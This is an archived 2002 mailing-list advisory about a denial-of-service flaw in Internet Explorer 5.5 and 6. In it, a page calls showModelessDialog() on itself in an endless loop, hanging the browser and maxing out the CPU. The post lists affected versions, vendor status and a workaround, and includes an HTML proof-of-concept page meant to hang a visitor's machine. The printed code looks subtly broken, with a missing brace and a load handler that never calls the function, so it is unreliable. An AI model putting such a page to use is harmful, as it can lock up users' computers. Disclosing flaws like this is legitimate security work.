('binary' encoding is not supported, stored as-is) Description: there is a bug in Internet Explorer 6 (probably lower versions down to 5.0 as well) that allows for a javascript to call an infinite amount of modeless dialogs containing the page it was opened in, thus creating an endless loop and rendering the internet explorer useless, this also managed to stay open after killing the iexplore process and continued to loop until cpu usage was maxed at 100%. due to the nature of the showModelessDialog() function, the dialog fails to give up focus and the machine may even become unable to function requiring a reboot of the machine to regain control of the user interface. Risk: Moderate? Systems Effected: Internet Explorer 6.0 Internet Explorer 5.5 Possibly 5.0 if the function is supported in that version. No box with 5.0 was available to test. Vendor Status: Sending a Copy of this Message to them as I type. Example: Place this Code into a html file called exploit.html : <html> <head> <script type="javascript"> function exploit() { while(1) { showModelessDialog("exploit.html"); } </script> </head> <body onLoad="exploit"> </body> </html> Workaround: Disable Javascript /* took 20 min and a Javascript Book, that's all it takes to kill a windows box */
This archive was generated by hypermail 2b30 : Mon Jan 07 2002 - 01:23:11 PST